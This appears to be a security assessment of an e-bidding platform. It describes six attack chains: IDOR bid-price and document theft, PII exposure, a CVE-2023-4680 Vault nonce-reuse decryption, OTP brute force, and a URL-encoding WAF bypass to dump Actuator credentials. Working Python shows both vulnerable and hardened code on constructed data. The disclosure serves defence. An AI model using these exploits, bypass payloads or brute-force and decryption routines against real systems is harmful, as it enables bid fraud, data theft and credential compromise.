Attack chain diagram
6 attack patterns covering the entire bidding lifecycle
Attack window timeline
Complete kill chain, from start to finish
Chain 1: IDOR Price Disclosure
CVSS 9.1 | View competitor bid prices via IDOR | Window: Post-Bidding (plaintext) / During Bidding (min/max range)
Exploit IDOR in the merchant-ebidding endpoints to view competitor bid prices. After bidding closes the exact price is returned in plaintext; while bidding is still open, the min/max price range is disclosed. Requires only a valid JWT from any merchant account and a forged dataProfile.
Step 1. Look up any company by TIN (tax ID) to obtain its AES-encrypted bidderId. There is no authorization check on the TIN parameter: any merchant can query any other merchant.
Step 2. Submit the victim's bidderId together with any projectId to retrieve their bid price proposal, contract days, and min/max price range. The server does not verify that the requesting merchant owns the bidderId.
Step 3. Retrieve detailed bid submission info, including the authorized signer's name and position. The dataProfile is read from the request body (not a header), so it is trivially forged.
Chain 2: Document Theft & Sabotage
CVSS 9.8 | Steal and delete competitor documents | Window: Any Time
Chain the IDOR with the insecure file service to download and delete competitor documents. The upload service authenticates with a single static API key, with no JWT and no user binding, so anyone who knows a fileId can download or delete that file.
Step 1. Look up the victim company by TIN to get its encrypted bidderId. Same as Chain 1 Step 1.
Step 2. List all documents the victim submitted for a project. Returns the fileId of every uploaded file, including company registration, shareholder lists, financial statements, etc.
Step 3. Download any file using only the static API key header. No JWT required, no user binding, no access control. The API key is shared across the entire system.
Step 4. Delete any file by fileId. Same static API key auth as downloadFile. This is a destructive operation that removes competitor bid documents, potentially disqualifying them.
Chain 3: PII Disclosure
CVSS 8.6 | Access personal data (PII) | Window: Any Time
Exploit the IDOR to access personally identifiable information (PII) of any bidder, including company name, address, phone number, national ID, and OTP identifiers. Combines the getBidder TIN lookup with infoBidderTemplateData to extract the full PII record.
Step 1. Look up the victim company by TIN to get its encrypted bidderId. Same as Chain 1 Step 1.
Step 2. Retrieve the full bidder template data: company name, registered address, phone number, OTP ID, document number (national ID), and price submission status. No ownership check on bidderId.
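The missing check behind Chains 1 to 3 is the same one: the server trusts a client-supplied bidderId (or a bare fileId plus a shared key) instead of binding the lookup to the authenticated merchant. The following is an added Python example, not code from this report or from the assessed system. The bidder records, file store, merchant IDs, the `vuln_*`/`safe_*` function names and the `ATTACKER` principal are constructed stand-ins; `principal` models the claims of an already-verified JWT.

```python
import hmac

# Constructed stand-in data (not the real system's records). The real bidderId is an
# AES-encrypted value returned by the TIN lookup; here it is just an opaque label.
BIDDERS = {
    "bidder-A": {"tin": "0100000000001", "merchant": "merchantA",
                 "bid": {"price": 1_250_000, "contractDays": 90,
                         "minPrice": 1_100_000, "maxPrice": 1_400_000}},
    "bidder-B": {"tin": "0100000000002", "merchant": "merchantB",
                 "bid": {"price": 1_180_000, "contractDays": 120,
                         "minPrice": 1_000_000, "maxPrice": 1_300_000}},
}
FILES = {
    "file-77": {"owner": "bidder-B", "name": "financial_statement.pdf",
                "body": b"%PDF-1.4 constructed"},
}
STATIC_API_KEY = "shared-upload-key"    # one key for the whole system, as the page describes
ATTACKER = {"sub": "merchantA"}         # claims of a legitimate merchant who is also a bidder


# --- vulnerable shape: every lookup trusts the identifier the client sent -------------

def vuln_get_bidder_by_tin(principal, tin):
    # No check that `tin` belongs to `principal`: any merchant maps any TIN to a bidderId.
    return next(bid for bid, rec in BIDDERS.items() if rec["tin"] == tin)


def vuln_get_bid(principal, bidder_id, project_id):
    # Returns the bid for whatever bidderId the client supplied.
    return BIDDERS[bidder_id]["bid"]


def vuln_download_file(api_key, file_id):
    # Only the static service key is checked; no JWT, no owner binding.
    if not hmac.compare_digest(api_key, STATIC_API_KEY):
        raise PermissionError("bad api key")
    return FILES[file_id]["body"]


def vuln_delete_file(api_key, file_id):
    if not hmac.compare_digest(api_key, STATIC_API_KEY):
        raise PermissionError("bad api key")
    del FILES[file_id]


# --- hardened shape: the identifier is derived from the authenticated principal --------

def own_bidder_id(principal):
    """Resolve the caller's bidderId from the JWT subject, never from the request."""
    for bid, rec in BIDDERS.items():
        if rec["merchant"] == principal["sub"]:
            return bid
    raise PermissionError("no bidder record for this merchant")


def safe_get_bid(principal, bidder_id, project_id):
    # A client-supplied bidderId is accepted only if it is the caller's own.
    if bidder_id != own_bidder_id(principal):
        raise PermissionError("bidderId does not belong to caller")
    return BIDDERS[bidder_id]["bid"]


def safe_file_op(api_key, principal, file_id, delete=False):
    # The service-to-service key AND the end user's ownership of the file are both required.
    if not hmac.compare_digest(api_key, STATIC_API_KEY):
        raise PermissionError("bad api key")
    if FILES[file_id]["owner"] != own_bidder_id(principal):
        raise PermissionError("file belongs to another bidder")
    if delete:
        return FILES.pop(file_id)["body"]
    return FILES[file_id]["body"]


def denied(fn, *args, **kwargs):
    """Demo helper: True if the call is refused with PermissionError."""
    try:
        fn(*args, **kwargs)
    except PermissionError:
        return True
    return False
```

In the vulnerable shape the TIN lookup, the bid lookup and the file service each answer for any identifier; in the hardened shape the bidderId comes from the token and the file service checks the file owner against it, so the static key alone no longer authorizes a download or a delete.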
Chain 4: CVE-2023-4680 Vault Transit Decrypt
CVSS 9.8 | Decrypt bid prices from Vault (2 layers) | Window: During Active Bidding
Exploit the CVE-2023-4680 nonce-reuse vulnerability in the HashiCorp Vault 1.11.3 Transit engine to fully decrypt the 2-layer encrypted bid prices during active bidding. The Layer 1 (AES-256-ECB) key is exportable; Layer 2 (AES-256-GCM96) is broken by nonce reuse, which recovers the keystream and allows XOR decryption of any ciphertext under that nonce.
Step 1. Authenticate to Vault using an expired JWT. As configured, the Vault JWT auth backend does not validate token expiration, so any previously valid JWT yields a 32-day Vault token.
Step 2. Export the Layer 1 AES-256-ECB key from Vault Transit. The key is marked exportable, so any authenticated merchant can retrieve the raw key material. The key name follows the pattern key1_YYYYMMDD_AM or key1_YYYYMMDD_PM, chosen by the JWT issuance time.
Step 3. Intercept the double-encrypted bid price from the confirm endpoint. The submitData field carries vault:v1: prefixed ciphertext (Layer 2 wrapping the Layer 1 encrypted price).
Step 4. Exploit CVE-2023-4680: ask Transit to encrypt an all-zero plaintext of the same length as the target ciphertext, supplying the nonce extracted from that ciphertext. Vault 1.11.3 honours caller-supplied nonces, and because GCM is CTR mode underneath, the ciphertext of zeros is the keystream for that nonce.
Step 5. XOR the target ciphertext with the recovered keystream to obtain the Layer 1 ciphertext, then AES-256-ECB decrypt it with the exported key1 to recover the plaintext JSON containing the exact bid price, contract days, and other bid details.
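Steps 3 to 5 carried out end to end, as an added example in Python (using the `cryptography` package) that is not code from this report or from Vault. The two keys, the bid JSON and the `transit_encrypt` oracle are constructed: the oracle models the vulnerable behaviour of POST /v1/transit/encrypt/<key> on an aes256-gcm96 key before the CVE-2023-4680 fix, and its vault:v1:base64(nonce || ciphertext || tag) layout is an assumption about Vault's ciphertext format, not something taken from the target. The Layer 1 padding (PKCS7) is likewise assumed, since the page does not state it.

```python
import base64
import json
import os

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

NONCE_LEN = 12   # aes256-gcm96: 96-bit nonce
TAG_LEN = 16     # GCM authentication tag

# Constructed keys. key1 stands in for the exportable Layer 1 ECB key (Step 2);
# key2 stands in for the non-exportable Transit GCM key the attacker never sees.
KEY1_ECB = bytes(range(32))
KEY2_GCM = bytes(range(100, 132))


def layer1_encrypt(plaintext, key):
    """Layer 1 as the page describes it: AES-256-ECB (PKCS7 padding assumed)."""
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return enc.update(padded) + enc.finalize()


def layer1_decrypt(ciphertext, key):
    dec = Cipher(algorithms.AES(key), modes.ECB()).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def transit_encrypt(plaintext, nonce=None):
    """Stand-in for the Transit encrypt endpoint on an aes256-gcm96 key.

    Assumed output layout: vault:v1:base64(nonce || ciphertext || tag).
    The bug: a caller-supplied `nonce` is honoured instead of being generated server-side.
    """
    if nonce is None:
        nonce = os.urandom(NONCE_LEN)
    ct_and_tag = AESGCM(KEY2_GCM).encrypt(nonce, plaintext, None)
    return "vault:v1:" + base64.b64encode(nonce + ct_and_tag).decode()


def split_transit(blob):
    """Return (nonce, ciphertext-without-tag) from a vault:v1: blob."""
    raw = base64.b64decode(blob[len("vault:v1:"):])
    return raw[:NONCE_LEN], raw[NONCE_LEN:-TAG_LEN]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def bidder_submit(bid):
    """What the victim's client does: Layer 1 ECB, then Layer 2 through Transit."""
    return transit_encrypt(layer1_encrypt(json.dumps(bid).encode(), KEY1_ECB))


def attacker_decrypt(submit_data, exported_key1):
    """Steps 3 to 5: needs only the intercepted blob, the encrypt oracle and the exported key1."""
    nonce, ct2 = split_transit(submit_data)
    # Step 4: GCM is CTR mode underneath, so E(0...0) under the reused nonce is the
    # keystream for exactly those byte positions. The tag plays no part in this.
    _, keystream = split_transit(transit_encrypt(b"\x00" * len(ct2), nonce=nonce))
    ct1 = xor(ct2, keystream)                                # peel Layer 2
    return json.loads(layer1_decrypt(ct1, exported_key1))    # peel Layer 1 (Step 5)


if __name__ == "__main__":
    victim_bid = {"priceProposal": 1250000, "contractDays": 90}   # constructed
    print(attacker_decrypt(bidder_submit(victim_bid), KEY1_ECB))
```

The attacker never learns the GCM key: the oracle does the AES work, and reusing its nonce turns it into a keystream generator. Patched Vault versions (1.14.3, 1.13.7, 1.12.11 and later) ignore a caller-supplied nonce unless the key is convergent, which removes Step 4 entirely.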
Chain 5: Blockchain & OTP Bypass
CVSS 8.1 | Attack the blockchain and OTP | Window: During Active Bidding
Exploit the blockchain timing oracle and OTP weaknesses to determine exact bid submission times, brute-force OTP codes, and write to competitor bid records. The txId encodes a nanosecond-precision timestamp, the OTP has no rate limiting, and infoCallBack triggers updateSubmitStatus on competitor data.
Step 1. Query any transaction ID against the blockchain to check whether a bid has been submitted. Because the txId is a nanosecond-precision unix timestamp, this reveals the exact submission timing of any competitor's bid.
Step 2. Decode the txId returned by infoCallBack to extract the exact bid submission time with nanosecond precision. The txId is simply a unix timestamp in nanoseconds, so it reveals when each competitor submitted their bid.
Step 3. Brute-force OTP codes with no rate limiting. Tested 30+ wrong OTP attempts with no lockout or delay; average response time ~470 ms per attempt. A 4-character alphanumeric OTP is feasible to brute-force during the bidding window.
Step 4. The infoCallBack endpoint has a side effect: it triggers updateSubmitStatus on the target bid data. This is a WRITE operation that can modify the submission status of a competitor's bid record.
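The txId decoding of Steps 1 and 2 and the OTP brute force of Step 3, as an added Python example that is not code from this report or from the assessed system. The 36-symbol (A-Z, 0-9) alphabet, the 4-character length, the attempt budget of the hardened verifier and the class names are assumptions; the page only says the OTP is 4-character alphanumeric. The vulnerable verifier reproduces the reported behaviour (unlimited attempts, no delay); the hardened one is the fix a practitioner would want beside it.

```python
import hmac
import itertools
import string
import time
from datetime import datetime, timezone


def decode_txid(txid):
    """txId is a unix timestamp in nanoseconds (per the page). Returns (UTC datetime
    at microsecond resolution, leftover nanoseconds) so no precision is lost."""
    secs, nanos = divmod(int(txid), 1_000_000_000)
    dt = datetime.fromtimestamp(secs, tz=timezone.utc).replace(microsecond=nanos // 1000)
    return dt, nanos % 1000


OTP_ALPHABET = string.ascii_uppercase + string.digits   # assumed 36-symbol alphabet
OTP_LEN = 4


def keyspace_size():
    return len(OTP_ALPHABET) ** OTP_LEN                 # 36**4 = 1,679,616


def feasibility_hours(rtt_s, parallel=1):
    """Worst-case wall clock to exhaust the keyspace at `rtt_s` per attempt
    with `parallel` concurrent requests and no rate limiting."""
    return keyspace_size() * rtt_s / parallel / 3600


class VulnOtpVerifier:
    """Shape the page reports: unlimited attempts, no delay, no lockout."""

    def __init__(self, code):
        self.code = code
        self.attempts = 0

    def verify(self, guess):
        self.attempts += 1
        return guess == self.code


class HardenedOtpVerifier:
    """Per-OTP attempt budget, expiry, single use, constant-time compare."""

    MAX_ATTEMPTS = 5   # assumed budget

    def __init__(self, code, ttl_s=300, now=time.monotonic):
        self._code = code
        self._now = now
        self._expires = now() + ttl_s
        self.attempts = 0
        self.locked = False
        self.used = False

    def verify(self, guess):
        if self.locked or self.used or self._now() > self._expires:
            return False
        self.attempts += 1
        ok = hmac.compare_digest(guess.encode(), self._code.encode())
        if ok:
            self.used = True          # a code is accepted at most once
            return True
        if self.attempts >= self.MAX_ATTEMPTS:
            self.locked = True        # further guesses are refused without checking
        return False


def brute_force(verifier, max_tries=None):
    """Walk the keyspace in order; returns (code, tries) or (None, tries) on lockout/limit."""
    tries = 0
    for chars in itertools.product(OTP_ALPHABET, repeat=OTP_LEN):
        guess = "".join(chars)
        tries += 1
        if verifier.verify(guess):
            return guess, tries
        if getattr(verifier, "locked", False) or (max_tries and tries >= max_tries):
            return None, tries
    return None, tries


if __name__ == "__main__":
    print(decode_txid(1700000000123456789))   # constructed txId
    print(brute_force(VulnOtpVerifier("AAAZ")))
    h = HardenedOtpVerifier("AAAZ")
    print(brute_force(h), "locked:", h.locked)
    print(f"serial exhaustion at 0.47 s/attempt: {feasibility_hours(0.47):.0f} h")
```

With the reported ~470 ms per attempt, exhausting the 36^4 space takes roughly 219 hours serially, so the practical attack relies on concurrent requests, which the absence of rate limiting permits. The hardened verifier refuses after a small fixed budget regardless of concurrency, and a lockout counter keyed on the OTP ID (not on the client IP) is what makes that budget hold.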
Chain 6: Actuator /env Mass Credential Dump
CVSS 8.6 | Dump credentials from every service via Actuator | Window: Any Time
Bypass the WAF URL filter to reach the Spring Boot Actuator /env endpoint of 27 microservices, extracting DB2 credentials, Kubernetes internal IPs, ActiveMQ admin passwords, API keys, and other secrets from their environment variables.
Step 1. Bypass the F5 ASM WAF by URL-encoding the letter 'a' in 'actuator' as %61. The WAF pattern matches the literal string 'actuator' but does not URL-decode the path before matching, so /%61ctuator/env passes through while the backend decodes it to /actuator/env.
Step 2. Iterate across all 27 known microservice base paths and read the environment variables of each. Yields DB2 credentials (27 databases), Kubernetes pod IPs, ActiveMQ cluster admin credentials, JWT signing secrets, and internal API keys.
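The matching defect in Step 1, and the normalised matcher that closes it, as an added Python example that is not code from this report, from F5 or from the assessed system. It also covers the double-encoded (%2561) and dot-segment variants, which the page does not mention; whether a given backend decodes twice depends on the container, so the bounded repeated decode is a conservative assumption. The access-log lines and the `/svc-a` paths are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

# Anchored on path segments so that e.g. "/api/actuators-list" is not a false positive.
ACTUATOR_RE = re.compile(r"(^|/)actuator(/|$)")


def naive_waf_blocks(path):
    """Literal match on the raw request-line path: the behaviour the page reports."""
    return "actuator" in path


def normalize_path(path):
    """Percent-decode until stable (bounded, catches %2561), collapse ./.. and //,
    then lowercase, so the WAF sees what the backend will route on."""
    prev, cur = None, path
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    cur = posixpath.normpath(cur)      # /svc/./%61ctuator -> /svc/actuator ; x/../ removed
    return cur.lower()


def normalized_waf_blocks(path):
    return bool(ACTUATOR_RE.search(normalize_path(path)))


# Constructed access-log lines: "METHOD PATH STATUS". The second line is the bypass
# from Step 1; the third is the literal form the existing rule already stops.
SAMPLE_LOG = [
    "GET /svc-a/api/bids 200",
    "GET /svc-a/%61ctuator/env 200",
    "GET /svc-a/actuator/env 403",
    "GET /svc-b/foo/../%2561ctuator/env 200",
]


def find_actuator_hits(log_lines):
    """Detection pass over access logs: returns (raw path, status) for every request
    that reaches an actuator path after normalisation, whichever encoding it used."""
    hits = []
    for line in log_lines:
        _method, path, status = line.split()
        if normalized_waf_blocks(path):
            hits.append((path, status))
    return hits


if __name__ == "__main__":
    for p in ["/actuator/env", "/%61ctuator/env", "/svc-a/%2561ctuator/env"]:
        print(p, "naive:", naive_waf_blocks(p), "normalized:", normalized_waf_blocks(p))
    print(find_actuator_hits(SAMPLE_LOG))
```

A 200 on a normalised actuator path in the logs is the retrospective indicator for this chain. On the application side, the exposure should not depend on the WAF at all: restrict `management.endpoints.web.exposure.include` to what is needed (for example `health`), move management endpoints to a separate port with `management.server.port`, and require authentication on `/actuator/**`.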